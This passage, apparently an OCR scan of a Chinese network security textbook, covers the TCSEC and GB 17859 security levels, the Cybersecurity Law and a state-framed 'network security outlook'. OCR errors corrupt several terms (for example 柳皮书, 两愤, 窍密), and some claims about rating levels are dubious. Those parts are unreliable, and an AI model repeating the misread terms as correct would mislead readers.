应 作用 ,防护 网 络 入 侵 造成 安全 破坏 。 防 火 墙 出 于 运行 效率 的 考虑 都 不 具有 病毒 防护 能 力 ， 
也 不 具有 破坏 恢复 能 力 。 所 以 只 有 把 两 者 结合 起 来 ,才能 实现 P2DR2 的 要 求 。 实 时 更 新 杀 
毒 软件 使 用 的 病毒 库 和 防火 墙 使 用 的 木马 库 , 则 是 P2DR2 模型 动态 性 的 体现 ,也 是 实时 保 
证 网 络 安 全 的 具体 要 求 。 


1.3.2 网 络 安全 评价 标准 


在 设计 一 个 网 络 信息 系统 或 者 对 完成 的 一 个 网 络 信息 系统 进行 安全 性 评价 的 时 候 , 必 
须 依 靠 相 应 的 标准 进行 ,包括 国际 评价 标准 和 国内 评价 标准 。 

1. 国际 评价 标准 

1985 年 ,美国 国防 部 制定 了 计算 机 安全 标准 一 一 可 信任 计算 机 标准 评价 准则 (Trusted 
Computer System Evaluation Criteria,TCSEC) ,或 者 叫做 网 络 安全 柳 皮 书 ,对 计算 机 系统 
的 安全 性 进行 分 级 。 该 评价 准则 将 安全 的 级 别 从 高 到 低 分 成 4 个 类 别 : A 类 、B 类 、C 类 、D 
类 ,每 类 又 分 为 几 个 级 别 , 共 7 个 等 级 ,如 表 1-5 所 示 。 

D 类 安全 等 级 : 只 包括 D1 一 个 级 别 。D1 的 安全 等 级 最 低 。D1 系统 只 为 文件 和 用 户 
提供 安全 保护 。D1 系统 最 普通 的 形式 是 本 地 操作 系统 ,或 者 是 一 个 完全 没有 保护 的 网 络 。 
Windows 95/98 属于 D1 级 产品 。 
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表 1-5 可 信任 计算 机 标准 评价 准则 
































类 别 | 级 别 名 称 主要 特征 

下 D1 低级 保护 没有 安全 保护 

Cl 自主 安全 保护 自主 存储 控制 
C2 受 控 存 储 控制 单独 的 可 查 性 ,安全 标识 
Bl 标识 的 安全 保护 强制 存 取 控 制 ,安全 标识 

B B2 结构 化 保护 面向 安全 的 体系 结构 , 较 好 的 抗 渗透 能 力 
B3 安全 区 域 存 取 监控 ,高 抗 渗透 能 力 

A Al 验证 设计 形式 化 的 最 高 级 描述 和 验证 


C 类 安全 等 级 : 该 类 安全 等 级 能 够 提供 审慎 的 保护 ,并 为 用 户 的 行动 和 责任 提供 审计 
能 力 。C 类 安全 等 级 可 划分 为 Cl 和 C2 两 类 。Cl 系统 的 可 信任 运算 基础 体制 (Trusted 
Computing Base,TCB) 通 过 将 用 户 和 数据 分 开 来 达到 安全 目的 。 在 C1 系统 中 ,所 有 的 用 户 
以 同样 的 灵敏 度 来 处 理 数 据 , 即 用 户 认为 Cl 系统 中 的 所 有 文档 都 具有 相同 的 机 密 性 。 
C2 系统 比 Cl 系统 加 强 了 可 调 的 审慎 控制 。 在 连接 到 网 络 上 时 ,C2 系统 的 用 户 分 别 对 各 自 
的 行为 负责 。C2 系统 通过 登录 过 程 、. 安 全 事件 和 资源 隔离 来 增强 这 种 控制 。C2 系统 具有 
Cl 系统 中 所 有 的 安全 性 特征 。 通 常 ,商用 的 操作 系统 都 属于 C2 安全 级 别 , 例 如 ,UNIX、 
Linux、Novell 3. X、Windows NT、Windows 2000、Windows 2003 和 Windows 2008 都 是 
C2 级 的 产品 。 

B 类 安全 等 级 ; B 类 安全 等 级 可 分 为 B1、B2 和 B3 三 类 。B 类 系统 具有 强制 性 保护 功 
能 。 强 制 性 保护 意味 着 如 果 用 户 没 有 与 安全 等 级 相连 ,系统 就 不 会 让 用 户 存 取 对 象 。 

B1 系统 满足 下 列 要 求 : 系统 对 网 络 控制 下 的 每 个 对 象 都 进行 灵敏 度 标记 ; 系统 使 用 灵 
敏 度 标记 作为 所 有 强迫 访问 控制 的 基础 ; 系统 在 把 导入 的 、 非 标记 的 对 象 放 入 系统 前 标记 
它们 ; 灵敏 度 标 记 必须 准确 地 表示 其 所 联系 的 对 象 的 安全 级 别 ; 当 系 统管 理 员 创建 系统 或 
者 增加 新 的 通信 通道 或 1/O 设备 时 ,管理 员 必 须 指定 每 个 通信 通道 和 1/O 设备 是 单 级 还 是 
多 级 ,并 且 管 理 员 只 能 手工 改变 指定 ; 单 级 设备 并 不 保持 传输 信息 的 灵敏 度 级 别 ; 所 有 直 
接 面向 用 户 位 置 的 输出 (无 论 是 虚拟 的 还 是 物理 的 ) 都 必须 产生 标记 来 指示 关于 输出 对 象 的 
灵敏 度 ; 系统 必须 使 用 用 户 的 口令 或 证 明 来 决定 用 户 的 安全 访问 级 别 ; 系统 必须 通过 审计 
来 记录 未 授权 访问 的 企图 。 

B2 系统 必须 满足 Bl 系统 的 所 有 要 求 。 另 外 ,B2 系统 的 管理 员 必 须 使 用 一 个 明确 的 、 
文档 化 的 安全 策略 模式 作为 系统 的 可 信任 运算 基础 体制 。B2 系统 必须 满足 下 列 要 求 : 系 
统 必须 立即 通知 系统 中 的 每 一 个 用 户 所 有 与 之 相关 的 网 络 连接 的 改变 ; 只 有 用 户 能 够 在 可 
信任 通信 路 径 中 进行 初始 化 通信 ; 可 信任 运算 基础 体制 能 够 支持 独立 的 操作 者 和 管理 员 。 

B3 系统 必须 符合 B2 系统 的 所 有 安全 需求 。B3 系统 具有 很 强 的 监视 委托 管理 访问 能 
力 和 抗 干扰 能 力 。B3 系统 必须 设 有 安全 管理 员 。B3 系统 应 满足 以 下 要 求 : 除了 控制 对 个 
别 对 象 的 访问 外 ,B3 必须 产生 一 个 可 读 的 安全 列表 ; 每 个 被 命名 的 对 象 提供 对 该 对 象 没有 
访问 权 的 用 户 列 表 说 明 ; B3 系统 在 进行 任何 操作 前 ,要 求 用 户 进行 身份 验证 ; B3 系统 验证 
每 个 用 户 , 同 时 还 会 发 送 一 个 取消 访问 的 审计 跟踪 消息 ; 设计 者 必须 正确 区 分 可 信任 的 通 
信和 路 径 和 其 他 路 径 ; 可 信任 的 通信 基础 体制 为 每 一 个 被 命名 的 对 象 建立 安全 审计 跟踪 ; 可 
信任 的 运算 基础 体制 支持 独立 的 安全 管理 。 一 些 军 用 系统 的 安全 性 属于 B 级 。 
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A 类 安全 等 级 : A 系统 的 安全 级 别 最 高 。 目 前 ,A 类 安全 等 级 只 包含 Al 一 个 安全 类 
别 。Al 类 与 B3 类 相似 ,对 系统 的 结构 和 策略 不 作 特别 要 求 。Al 系统 的 显著 特征 是 ,系统 
的 设计 者 必须 按照 一 个 正式 的 设计 规范 来 分 析 系 统 。 对 系统 分 析 后 ,设计 者 必须 运用 核对 
技术 来 确保 系统 符合 设计 规范 。Al 系统 必须 满足 下 列 要 求 : 系统 管理 员 必 须 从 开发 者 那 
里 接收 到 一 个 安全 策略 的 正式 模型 ; 所 有 的 安装 操作 都 必须 由 系统 管理 员 进行 ; 系统 管理 
员 进 行 的 每 一 步 安 装 操作 都 必须 有 正式 文档 。A 级 安全 性 最 高 ,但 只 有 不 接 电源 的 计算 机 
才能 达到 ,事实 上 它 只 是 一 个 概念 模型 。 

2. 国内 评价 标准 

1999 年 10 月 ,国家 质量 技术 监督 局 批准 发 布 了 (计算 机 信息 系统 安全 保护 等 级 划分 准 
则 》(GB 17859 一 1999) ,将 计算 机 安全 保护 划分 为 以 下 5 个 从 低 到 高 的 级 别 。 

(1) 第 一 级 : 用 户 自 主 保护 级 (GB1 安全 级 ), 它 的 安全 保护 机 制 使 用 户 具 备 自主 安全 
保护 的 能 力 ,保护 用 户 的 信息 免 受 非法 的 读 写 破坏 。 

(2) 第 二 级 : 系统 审计 保护 级 (GB2 安全 级 ) , 除 具 备 第 一 级 所 有 的 安全 保护 功能 外 ,要 
求 创建 和 维护 访问 的 审计 跟踪 记录 ,使 所 有 的 用 户 对 自己 行为 的 合法 性 负责 。 

(3) 第 三 级 : 安全 标记 保护 级 (GB3 安全 级 ) , 除 继承 前 一 个 级 别 的 安全 功能 外 ,还 要 求 
以 访问 对 象 标记 的 安全 级 别 限制 访问 者 的 访问 权限 ,实现 对 访问 对 象 的 强制 保护 。 

(4) 第 四 级 : 结构 化 保护 级 (GB4 安全 级 ) , 除 继承 前 面 安全 级 别 安全 功能 的 基础 外 ,将 
安全 保护 机 制 划 分 为 关键 部 分 和 非 关 键 部 分 ,对 关键 部 分 直接 控制 访问 者 对 访问 对 象 的 存 
取 , 从 而 加 强 系统 的 抗 渗透 能 力 。 

(5) 第 五 级 : 访问 验证 保护 级 (GB5 安全 级 ) ,这 一 个 级 别 特别 增设 了 访问 验证 功能 , 负 
责 仲裁 访问 者 对 访问 对 象 的 所 有 访问 活动 。 该 安全 级 别 中 系统 具有 很 高 的 抗 渗透 能 力 。 

应 该 承认 ,标准 的 制定 需要 较为 广泛 的 应 用 经 验 和 较为 深入 的 研究 背景 ,也 需要 强大 的 
技术 支撑 ,在 这 些 方面 ,我 国 还 存在 一 定 的 差距 ,这 方面 的 工作 还 需要 更 为 深入 的 研究 。 


1.4 《网 络 安 全 法 》 


《网 络 安全 法 ) 是 我 国 第 一 部 全 面 规范 网 络 空间 安全 管理 方面 问题 的 基础 性 法 律 ,是 我 
国 网 络 空间 法 治 建设 的 重要 里 程 碑 , 是 依法 治 网 ,化 解 网 络 风险 的 法 律 重 器 ,是 让 互联 网 在 
法 治 轨道 上 健康 运行 的 重要 保障 。 

《网 络 安全 法 ) 将 近年 来 一 些 成 熟 的 做 法 制度 化 ,并 为 将 来 可 能 的 制度 创新 做 了 原则 性 
规定 ,为 网 络 安全 工作 提供 切实 法 律 保障 。 


1.4.1 《网 络 安全 法 ) 解 读 


网 络 安全 法 共 七 章 七 十 九条 ,内 容 上 有 六 方面 亮点 : 
1. 基本 原则 


(1) 网 络 空间 主权 原则 。《 网 络 安全 法 ) 第 一 条 “立法 目的 ”开宗明义 ,明确 规定 要 维护 
我 国 网 络 空 间 主 权 。 网 络 空 间 主权 是 一 国 国家 主权 在 网 络 空 间 中 的 自然 延伸 和 表现 。 习 近 
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平 总 书记 指出 《联合 国 宪 章 》 确 立 的 主权 平等 原则 是 当代 国际 关系 的 基本 准则 ,覆盖 国 与 国 
交往 各 个 领域 ,其 原则 和 精神 也 应 该 适用 于 网 络 空间 。 各 国 自主 选择 网 络 发 展 道路 、 网 络 管 
理 模式 .互联 网 公共 政策 和 平等 参与 国际 网 络 空间 治理 的 权利 应 当 得 到 尊重 。 第 二 条 明确 
规定 《网络 安全 法 》 适 用 于 我 国境 内 网 络 以 及 网 络 安全 的 监督 管理 。 这 是 我 国 网 络 空间 主权 
对 内 最 高 管辖 权 的 具体 体现 。 

(2) 网 络 安全 与 信息 化 发 展 并 重 原则 。 习 近 平 总 书记 指出 ,安全 是 发 展 的 前 提 , 发 展 是 
安全 的 保障 ,安全 和 发 展 要 同步 推进 。 网 络 安全 和 信息 化 是 一 体 之 两 愤 、 驱 动 之 双 轮 ,必须 
统一 谋划 、 统 一 部 署 、 统 一 推进 、 统 一 实施 .《 网 络 安全 法 }》 第 三 条 明确 规定 : 国家 坚持 网 络 
安全 与 信息 化 并 重 ,遵循 积极 利用 、 科 学 发 展 , 依 法 管理 、 确 保安 全 的 方针 ; 既 要 推进 网 络 基 
础 设施 建设 ,鼓励 网 络 技术 创新 和 应 用 ,又 要 建立 健全 网 络 安全 保障 体系 ,提高 网 络 安全 保 
护 能 力 ,做 到 * 双 轮 驱动 .两翼 齐 飞 ”。 

(3) 共同 治理 原则 。 网 络 空间 安全 仅仅 依靠 政府 是 无 法 实现 的 ,需要 政府 、 企 业 、 社 会 
组 织 、 技 术 社 群 和 公民 等 网 络 利益 相关 者 的 共同 参与 。《 网 络 安全 法 ) 坚 持 共 同治 理 原则 ,要 
求 采取 措施 鼓励 全 社会 共同 参与 ,政府 部 门 、 网 络 建设 者 、 网 络 运 营 者 、 网 络 服务 提供 者 、 网 
络 行 业 相 关 组 织 、 高 等 院 校 、 职 业 学 校 , 社 会 公众 等 都 应 根据 各 自 的 角色 参与 网 络 安 全 治理 
工作 。 

2. 提出 制定 网 络 安全 战略 ,明确 网 络 空间 治理 目标 ,提高 我 国 网 络 安全 政策 的 透明 度 


《网 络 安全 法 ) 第 四 条 明确 提出 了 我 国 网 络 安全 战略 的 主要 内 容 , 即 : 明确 保障 网 络 安 
全 的 基本 要 求 和 主要 目标 ,提出 重点 领域 的 网 络 安全 政策 、 工 作 任务 和 措施 。 第 七 条 明确 规 
定 , 我 国 致力 于 “推动 构建 和 平 , 安 全 ,开放 ,合作 的 网 络 空间 ,建立 多 边 、 民 主 、 透 明 的 网 络 治 
理 体 系 .” 这 是 我 国 第 一 次 通过 国家 法 律 的 形式 向 世界 宣示 网 络 空 间 治 理 目 标 ,明确 表达 了 
我 国 的 网 络 空间 治理 诉求 。 上 述 规定 提高 了 我 国 网 络 治理 公共 政策 的 透明 度 ,与 我 国 的 网 
络 大 国 地 位 相称 ,有 利于 提升 我 国 对 网 络 空间 的 国际 话 请 权 和 规则 制定 权 , 促 成 网 络 空间 国 
际 规则 的 出 台 。 

3. 进一步 明确 了 政府 各 部 门 的 职责 权限 .完善 了 网 络 安全 监管 体制 

《网 络 安全 法 ) 将 现行 有 效 的 网 络 安全 监管 体制 法 制 化 ,明确 了 网 信和 部门 与 其 他 相关 网 
络 监管 部 门 的 职责 分 工 。 第 八条 规定 ,国家 网 信和 部门 负责 统筹 协调 网 络 安全 工作 和 相关 监 
督 管理 工作 ,国务 院 电 信和 主管 部 门 、 公 安 部 门 和 其 他 有 关机 关 依 法 在 各 自 职 责 范 围 内 负责 网 
络 安 全 保护 和 监督 管理 工作 。 这 种 “1 十 X” 的 监管 体制 ,符合 当前 互联 网 与 现实 社会 全 面 融 
合 的 特点 和 我 国 的 监管 需要 。 

4. 强化 了 网 络 运行 安全 ,重点 保护 关键 信息 基础 设施 

《网 络 安全 法 } 第 三 章 用 了 近 三 分 之 一 的 篇 幅 规范 网 络 运行 安全 ,特别 强调 要 保障 关键 
信息 基础 设施 的 运行 安全 。 关 键 信息 基础 设施 是 指 那些 一 旦 遭 到 破坏 、 丧 失 功能 或 者 数据 
泄露 ,可 能 严重 危害 国家 安全 、 国 计 民生 、 公 共 利 益 的 系统 和 设施 。 网 络 运行 安全 是 网 络 安 
全 的 重心 ,关键 信息 基础 设施 安全 则 是 重 中 之 重 ,与 国家 安全 和 社会 公共 利益 息息相关 。 为 
此 ,网 络 安 全 法 ) 强 调 在 网 络 安全 等 级 保护 制度 的 基础 上 ,对 关键 信息 基础 设施 实行 重点 保 
护 , 明 确 关键 信息 基础 设施 的 运营 者 负 有 更 多 的 安全 保护 义务 ,并 配 以 国家 安全 审查 、 重 要 
数据 强制 本 地 存储 等 法 律 措施 ,确保 关键 信息 基础 设施 的 运行 安全 。 
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5. 完善 了 网 络 安全 义务 和 责任 ,加 大 了 违法 惩处 力度 

《网 络 安全 法 ;) 将 原来 散 见于 各 种 法 规 、 规 章 中 的 规定 上 升 到 人 大 法 律 层面 ,对 网 络 运营 
者 等 主体 的 法 律 义务 和 责任 做 了 全 面 规定 ,包括 守法 义务 ,遵守 社会 公德 .商业 道德 义务 , 诚 
实 信用 义务 ,网 络 安全 保护 义务 ,接受 监督 义务 ,承担 社会 责任 等 ,并 在 网 络 运行 安全 、 网 络 
信息 安全 ,监测 预警 与 应 急 处 置 等 章节 中 进一步 明确 、 细 化 。 在 法 律 责 任 中 则 提高 了 违法 行 
为 的 处 罚 标准 ,加 大 了 处 罚 力 度 , 有 利于 保障 (网 络 安全 法 ) 的 实施 。 

6. 将 监测 预警 与 应 急 处 置 措施 制度 化 、 法 制 化 

《网 络 安全 法 }) 第 五 章 将 监测 预警 与 应 急 处 置 工作 制度 化 法 制 化 ,明确 国家 建立 网 络 安 
全 监测 预警 和 信息 通报 制度 ,建立 网 络 安全 风险 评估 和 应 急 工作 机 制 ,制定 网 络 安全 事件 应 
急 预 案 并 定期 演练 。 这 为 建立 统一 高 效 的 网 络 安全 风险 报告 机 制 ,情报 共享 机 制 、 研 判处 置 
机 制 提供 了 法 律 依据 ,为 深化 网 络 安全 防护 体系 ,实现 全 天 候 全 方位 感知 网 络 安 全 态势 提供 
了 法 律 保障 。 


1.4.2 网络 安全 观 


习近平 总 书记 在 2016 年 4 月 19 日 主持 召开 的 网 络 安全 和 信息 化 工作 座谈 会 上 强调 ， 
维护 网 络 安 全 “要 树立 正确 的 网 络 安全 观 ”。 

所 谓 网 络 安 全 观 ,是 人 们 对 网 络 安全 这 一 重大 问题 的 基本 观点 和 和 看法。 

要 树立 正确 的 网 络 安 全 观 , 应 当 把 握 好 以 下 六 个 方面 的 关系 。 

(1) 网 络 安全 与 国家 主权 : 承认 和 尊重 各 国 网 络 主权 是 维护 网 络 安全 的 前 提 。 

国家 主权 是 国家 的 固有 权利 ,是 国家 独立 的 重要 标志 。 网 络 主权 或 网 络 空间 主权 是 国 
家 主权 在 网 络 空间 的 自然 延伸 和 体现 。 对 内 而 言 , 网 络 主权 是 指 国家 独立 自主 地 发 展 、 管 
理 , 监 督 本 国 互联 网 事务 ,不 受 外 部 干涉 ; 对 外 而 言 , 网 络 主权 是 指 一 国 能 够 平等 地 参与 国 
际 互联 网 治理 ,有 权 防 止 本 国 互联 网 受到 外 部 入 侵 和 攻击 。 目 前 ,网 络 主权 的 观念 已 经 得 到 
多 数 国家 的 认可 。 网 络 空间 不 是 一 个 如 同 传统 的 公海 .极地 ,太空 一 样 的 全 球 公 域 , 而 是 建 
立 在 各 国 主权 之 上 的 一 个 相对 开放 的 信息 领域 。 

对 于 网 络 霸权 国家 来 讲 , 最 好 没有 网 络 主权 ,这 样 它 可 以 自由 出 人 于 网 络 空间 的 每 个 节 
点 和 角落 ,但 对 于 其 他 国家 而 言 , 网 络 主权 却 是 管辖 本 国 网 络 、 维 护 本 国 网 络 安全 的 前 提 。 
若 没有 网 络 主权 ,网 络 安全 也 就 失去 了 根基 。 承 认 和 尊重 各 国 网 络 主权 ,就 应 该 尊重 各 国 自 
主 选择 网 络 发 展 道路 、 网 络 管理 模式 .互联 网 公共 政策 和 平等 参与 国际 网 络 空间 治理 的 权 
利 ; 就 不 得 利用 网 络 技术 优势 搞 网 络 霸 权 ; 就 不 得 借口 网 络 自 由 干涉 他 国内 政 ; 就 不 得 为 
了 谋求 已 国 的 所 谓 绝对 安全 而 从 事 、 纵 容 或 支持 危害 他 国 国家 安全 的 网 络 活动 。 

(2) 网 络 安全 与 国家 安全 : 没有 网 络 安全 就 没有 国家 安全 。 

随 着 网 络 信息 技术 的 迅猛 发 展 和 广泛 应 用 ,特别 是 我 国 国民 经 济 和 社会 信息 化 建设 进 
程 的 全 面 加 快 ,网 络 信息 系统 的 基础 性 .全 局 性 作用 日 益 增强 。 网 络 已 经 成 为 实现 国家 稳 
定 、 经 济 繁荣 和 社会 进步 的 关键 基础 设施 。 同 时 必须 看 到 ,境内 外 敌对 势力 针对 我 国 网 络 的 
攻击 破坏、. 疏 怖 活动 和 利用 信息 网 络 进行 的 反动 宣传 活动 日 益 狙 狂 , 严 重 危 害 我 国 国家 安 
全 ,影响 我 国信 息 化 建设 的 健康 发 展 。 网 络 安全 是 我 们 当前 面临 的 新 的 综合 性 挑战 。 它 不 
仅仅 是 网 络 本 身 的 安全 ,而 是 关 涉 到 国家 安全 和 社会 稳定 ,是 国家 安全 在 网 络 空间 中 的 具体 
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体现 ,理应 成 为 国家 安全 体系 的 重要 组 成 部 分 ,这 是 网 络 安全 整体 性 特点 的 体现 ,不 能 将 网 
络 安全 与 其 他 安全 割裂 。 

习近平 总 书记 倡导 “总 体 国家 安全 观 ”, 网 络 安全 是 整体 的 而 不 是 割裂 的 ,网 络 安全 对 国 
家 安全 牵 一 发 而 动 全 身 , 同 许多 其 他 方面 的 安全 都 有 着 密切 关系 。 在 信息 时 代 , 国 家 安全 体 
系 中 的 政治 安全 、 国 土 安全 ,军事 安 全 ,经 济 安全 ,文化 安全 ,社会 安全 、 科 技 安全 ,信息 安全 、 
生态 安全 资源 安全 、 核 安全 等 都 与 网 络 安全 密切 相关 ,这 是 因为 当今 国家 各 个 重要 领域 的 
基础 设施 都 已 经 网 络 化 、 信 息 化 ` 数 据 化 ,各 项 基础 设施 的 核心 部 件 都 离 不 开 网 络 信息 系统 。 
因此 ,如 果 网 络 安全 没有 保障 ,这 些 关 系 国 家 安全 的 重要 领域 都 暴露 在 风险 之 中 ,面临 被 攻 
击 的 可 能 ,国家 安全 就 无 从 谈 起 。 

(3) 网 络 安全 与 信息 化 发 展 : 网 络 安全 和 信息 化 是 一 体 之 两 愤 、 驱 动 之 双 轮 。 

习近平 总 书记 指出 ,安全 是 发 展 的 前 提 , 发 展 是 安全 的 保障 ,安全 和 发 展 要 同步 推进 。 
网 络 安全 和 信息 化 是 一 体 之 两 愤 、 驱 动 之 双 轮 ,必须 统一 谋划 、 统 一 部 署 、 统 一 推进 、 统 一 实 
施 。 这 非常 经 典 地 概括 了 网 络 安全 与 发 展 的 辩证 关系 。 

我 国 网 络 应 用 和 网 络 产业 发 展 很 快 ,但 网 络 安全 意识 不 足 , 网 络 安全 保障 没有 同步 跟 
上 。 因 此 ,要 在 加 强 信息 化 建设 的 同时 ,大力 开发 网 络 信息 核心 技术 ,培养 网 络 安全 人 才 队 
伍 , 加 快 构建 关键 信息 基础 设施 安全 保障 体系 ,全 天 候 全 方位 感知 网 络 安全 态势 ,增强 网 络 
安全 防御 能 力 和 威慑 能 力 ,为 国民 经 济 和 信息 化 建设 打造 一 个 安全 、 可 信 的 网 络 环境 。 

值得 注意 的 是 ,网 络 安全 是 相对 的 而 不 是 绝对 的 。 考 虑 到 网 络 发 展 的 需要 ,网络 安 全 应 
当 是 一 种 适度 安全 。 适 度 安全 是 指 与 因 非 法 访问 、 信 息 失 窃 、 网 络 破坏 而 造成 的 危险 和 损害 
相 适 应 的 安全 , 即 安全 措施 要 与 损害 后 果 相 适应 。 这 是 因为 采取 安全 措施 是 需要 成 本 的 ,对 
于 危险 较 小 或 损害 较 少 的 信息 系统 采取 过 于 严格 或 过 高 标准 的 安全 措施 ,有 可 能 牺牲 发 展 ， 
得 不 偿 失 。 

(4) 网 络 安全 与 法 治 : 让 互联 网 在 法 治 轨道 上 健康 运行 。 

伴随 着 互联 网 的 飞速 发 展 ,利用 网 络 实施 的 攻击 、 恐 怖 、 淫 秽 、 贩 毒 、 洗 钱 、 赌 博 、 窍 密 , 诈 
骗 等 犯罪 活动 时 有 发 生 , 网 络 谣言 .网 络 低 俗 信息 等 屡见不鲜 ,已 经 成 为 影响 国家 安全 、 社 会 
公共 利益 的 突出 问题 。 习 近 平 总 书记 指出 ,网 络 空间 不 是 “法 外 之 地 ”; 要 坚持 依法 治 网 、 依 
法 办 网 .依法 上 网 ,让 互联 网 在 法 治 轨道 上 健康 运行 。 

法 律 通过 设 定 各 个 主体 的 权利 义务 ,规范 政府 ` 组 织 和 个 人 的 行为 ,维护 正义 秩序 。 网 
络 空间 是 一 个 新 兴 领 域 , 并 随 着 技术 的 日 新 月 异 而 不 断 发 展 变化 ,传统 的 法 律 难以 适应 快速 
发 展 的 网 络 ,网 络 空间 的 许多 行为 和 现象 有 待 于 法 律 明确 规范 。 因 此 有 必要 加 快 网 络 立法 
进程 ,明确 网 络 主体 的 权利 义务 ,规范 网 民 的 网 络 信息 行为 ,依法 治理 网 络 空间 。 

我 国 当前 要 尽快 出 台 网 络 安全 法 .电子 商务 法 、 个 人 信息 保护 法 、 互 联网 信息 服务 管理 
法 .电子 政务 法 、 信 息 通信 法 等 网 络 空间 基础 性 法 律 ,依法 保障 网 络 运行 安全 数据 安全 、 信 
息 内容 安 全 ,全 面 推进 网 络 空间 法 治 化 建设 。 

(5) 网 络 安全 与 人 民 : 网 络 安全 为 人 民 , 网 络 安全 靠 人 民 。 

当前 的 互联 网 是 一 个 泛 在 网 , 绝 大 多 数 网 络 基础 设施 为 民用 设施 ,网 络 的 终端 延伸 到 千 
家 万 户 的 计算 机 上 和 亿 万 民众 的 手机 上 ,网 络 的 应 用 深入 到 人 们 的 日 常生 活 甚至 整个 生命 
过 程 中 。 各 个 网 络 之 间 高 度 关 联 \ 相 互 依赖 ,网 络 犯罪 分 子 或 敌对 势力 可 以 从 互联 网 的 任何 
一 个 节点 入 侵 某 个 特定 的 计算 机 或 网 络 实施 破坏 活动 , 轻 则 损害 个 人 或 企业 的 利益 , 重 则 和 危 
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害 社会 公共 利益 和 国家 安全 。 因 此 ,传统 的 安全 保护 方法 ,如 装 几 个 安全 设备 和 安全 软件 ， 
或 者 将 某 个 个 人 或 单位 重点 保护 起 来 ,已 经 无 法 满足 网 络 安全 保障 的 需要 。 泛 在 的 网 络 需 
要 泛 在 的 网 络 安全 维护 机 制 。 正 如 习近平 总 书记 所 指出 的 ,网 络 安全 是 共同 的 而 不 是 孤立 
的 ,网 络 安全 为 人 民 , 网 络 安全 靠 人 民 , 维 护 网 络 安 全 是 全 社会 共同 责任 ,需要 政府 ,企业 、 社 
会 组 织 、 广 大 网 民 共同 参与 , 共 筑 网 络 安 全 防线 。 

依靠 人 民 维 护 网 络 安全 ,首先 要 培养 人 民 的 网 络 安全 意识 。 总 体 来 讲 , 我 国 社会 公众 的 
网 络 安全 意识 比较 淡薄 。 由 于 大 多 数 的 网 络 服务 都 是 免费 的 ,人 们 在 尽情 享受 网 络 带 来 的 
福利 时 ,往往 容易 忽视 网 络 的 安全 隐患 。 因 此 ,培养 网 民 的 网 络 安全 意识 成 为 网 络 安全 的 首 
要 任务 之 一 ,许多 国家 都 将 此 作为 一 项 战略 行动 予以 重视 。 例 如 ,美国 在 2004 年 就 启动 了 
国家 网 络 安全 意识 月 活动 ; 澳大利亚 每 年 设 网 络 安全 意识 周 ; 日 本 从 小 学 .中 学 阶段 开展 
增强 网 络 安全 意识 的 活动 ; 印度 推动 和 发 起 综合 性 的 有 关 网 络 空 间 安 全 的 国家 意识 项 目 ， 
通过 电子 媒体 持续 开展 安全 素质 意识 和 宣传 运动 ,帮助 公民 意识 到 网 络 安全 的 挑战 ; 韩国 
设立 国家 信息 保护 日 ,在 小 学 、 初 中 和 高 中 阶段 加 强 网 络 安 全 教育 ,以 便 提 高 公众 意识 和 扩 
大 网 络 安全 领域 的 基础 。 我 国 也 从 2014 年 开始 每 年 举行 “网 络 安全 宣传 周 ” 活 动 ,帮助 公众 
更 好 地 了 解 ,感知 身边 的 网 络 安全 风险 ,增强 网 络 安全 意识 ,提高 网 络 安全 防护 技能 ,保障 用 
户 合法 权益 ,共同 维护 国家 网 络 安全 。 

(6) 网 络 安全 与 国际 社会 : 维护 网 络 安全 是 国际 社会 的 共同 责任 。 

全 球 互联 网 是 一 个 互联 互通 的 网 络 空间 ,网 络 安全 是 开放 的 而 不 是 封闭 的 ,网 络 的 开放 
性 必然 带 来 网 络 的 脆弱 性 。 各 国 是 网 络 空间 的 命运 共同 体 , 网 络 空间 的 安全 需要 各 国 多 边 
参与 ,多方 参 与 ,共同 维护 。 正 如 习近平 总 书记 所 指出 的 ,网 络 安全 是 全 球 性 挑战 ,没有 哪个 
国家 能 够 置身 事 外 、 独 善 其 身 , 维 护 网 络 安全 是 国际 社会 的 共同 责任 。 

各 国政 府 均 已 认识 到 保障 网 络 安全 需要 国际 合作 。 各 国 应 该 携手 努力 ,加 强 对 话 交流 ， 
有 效 管控 分 歧 ,推动 制定 各 方 普遍 接受 的 网 络 空间 国际 规则 ,共同 遏制 信息 技术 滥用 ,反对 
网 络 监听 和 网 络 攻击 ,反对 网 络 空间 军备 竞赛 和 网 络 恐 怖 主义 ,健全 打击 网 络 犯罪 司法 协助 
机 制 ,共同 维护 网 络 空间 和 平安 全 。 国 际 社会 要 本 着 相互 尊重 和 相互 信任 的 原则 ,通过 积极 
有 效 的 国际 合作 ,共同 构建 和 平安 全 开放 、 合 作 的 网 络 空间 ,建立 多 边民 主 、 透 明 的 国际 
互联 网 治理 体系 。 

综 上 所 述 , 网 络 安全 发 展 需要 理念 与 技术 并 行 : 

(1) 认识 网 络 安 全 的 对 抗 性 本 质 ,知己 知 彼 。 

习近平 总 书记 指出 ,“ 网 络 安全 的 本 质 在 对 抗 ,对 抗 的 本 质 在 攻防 两 端 能 力 较量 "。 这 种 
对 抗 与 较量 是 技术 的 对 抗 ,是 人 的 对 抗 , 是 一 种 体系 化 的 对 抗 。 一 个 国家 的 网 络 安 全 防御 能 
力 , 最 终 是 要 由 攻击 者 来 检验 的 。 网 络 安全 防御 技术 ,需要 在 与 安全 威胁 的 对 抗 中 持续 发 展 
成 长 。 

从 知 彼 角度 来 讲 ,我 国 面临 着 复杂 的 网 络 安全 压力 , 某 些 国家 凭借 庞大 的 网 络 攻击 机 构 
组 织 、 覆 盖 全 球 的 情报 工程 体系 、 制 式 化 的 网 络 攻击 装备 库 , 对 我 国 发 动 网 络 入侵 ,危害 我 国 
关键 信息 基础 设施 安全 。 

从 知己 角度 来 讲 ,我 国 在 网 络 安全 技术 积累 方面 ,技术 门类 比较 齐全 ,在 反 病毒 引擎 . 主 
动 防御 、 大 数据 安全 分 析 等 方面 ,有 部 分 单 点 技术 已 经 具备 国际 先进 水 平 。 但 我 国 基础 信息 
技术 短 板 较 多 ,尚未 形成 完善 先进 的 体系 。 因 此 我 们 无 须 妄 自 菲 薄 , 唯 有 按照 习近平 总 书记 
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“攻防 力量 要 对 等 。 要 以 技术 对 技术 ,以 技术 管 技术 ,做 到 魔 高 一 尺 、 道 高 一 丈 .” 的 要 求 , 通 
过 长 期 扎实 的 工作 ,建立 自身 持续 成 长 的 系统 工程 能 力 ,使 防御 技术 形成 一 个 有 效 防御 体系 
和 社会 机 制 , 才 能 实现 有 效 对 抗 和 防御 。 

(2) 尊重 网 络 安全 的 基本 规律 属性 ,避免 错误 认 知 。 网 络 安全 的 进步 是 两 方面 的 : 一 
